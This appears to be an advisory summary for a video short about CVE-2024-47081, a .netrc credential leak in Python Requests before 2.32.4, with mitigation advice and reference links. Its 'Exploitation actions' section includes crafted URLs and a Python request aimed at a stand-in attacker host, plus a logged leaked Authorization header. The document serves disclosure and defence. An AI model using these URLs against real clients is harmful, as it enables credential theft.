requests: Netrc credential leak in PSF requests library (CVE-2024-47081) #shorts
Summary
In today’s episode, we dive into CVE-2024-47081, a recently disclosed credential leak vulnerability in the Python Requests library. This flaw can expose .netrc authentication details when processing specially crafted URLs, potentially sending sensitive credentials to an attacker-controlled server.
Product details
The affected product is the PSF Requests HTTP library, versions prior to 2.32.4. Requests is widely used in Python applications to simplify HTTP interactions. By default, it can read credentials from a .netrc file stored on the user’s system.
Vulnerability type summary
CVE-2024-47081 is classified under CWE-522: Insufficiently Protected Credentials. The core issue is a URL parsing error that fails to guard .netrc credentials against exposure when the library follows redirects or handles maliciously crafted URLs.
Details of the vulnerability
Because of a flaw in the URL parser, Requests versions before 2.32.4 may include .netrc credentials in outgoing HTTP requests to unintended hosts. An attacker can host a malicious URL that, when requested by a vulnerable client, causes the client to send its .netrc username and password to the attacker’s server. To mitigate the issue, users should upgrade to Requests 2.32.4 or later. As a temporary workaround on older versions, applications can disable .netrc support by setting `trust_env=False` on their Session objects.
Conclusion
If you use the Requests library in your Python projects, immediately upgrade to version 2.32.4. Review your code for any reliance on .netrc authentication and consider disabling it if you cannot patch right away. Always follow best practices for credential storage and transport to minimize exposure of sensitive data.
Watch the full video on YouTube: CVE-2024-47081
Remediation and exploitation details
This chain involves the following actors
- Malicious Actor: Creates and hosts manipulated URLs to trigger credential leakage
- Application Developer or User: Runs code with the Requests library using .netrc-based authentication
This following systems are involved
- Requests Library (<2.32.4) (Issues Hypertext Transfer Protocol requests with optional .netrc credentials): Vulnerable component that may send credentials to unintended endpoints
- .netrc File (Stores user credentials for automated authentication): Source of sensitive credentials
- Malicious Server (Hosts crafted URLs and collects leaked credentials): Attacker-controlled endpoint
Attack entry point
- Maliciously-Crafted URL: A URL designed to confuse the library’s parser so that it attaches .netrc credentials to a request destined for attacker’s domain
Remediation actions
Exploitation actions
URL parsing manipulation
- https://trusted.example.com@attacker.example.com/endpoint
- https://trusted.example.com?next=https://attacker.example.com/steal
Unintended credential forwarding
- import requests
- session = requests.Session()
- response = session.get('https://trusted.example.com@attacker.example.com/endpoint')
Automatic environment trust
- Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=
Credential harvest
- Logged: GET /steal HTTP/1.1 Host: attacker.example.com Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://github.com/psf/requests/security/advisories/GHSA-9hjg-9r4m-mvj7
- https://github.com/psf/requests/pull/6965
- https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef
- https://requests.readthedocs.io/en/latest/api/#requests.Session.trust_env
- https://seclists.org/fulldisclosure/2025/Jun/2
- [2025-06-03] A credential leak vulnerability (CVE-2024-47081) in the PSF requests library has been identified.
- [2025-06-04] CVE-2024-47081: Netrc credential leak in PSF requests library
- [2025-06-03] CVE-2024-47081: Netrc credential leak in PSF requests library.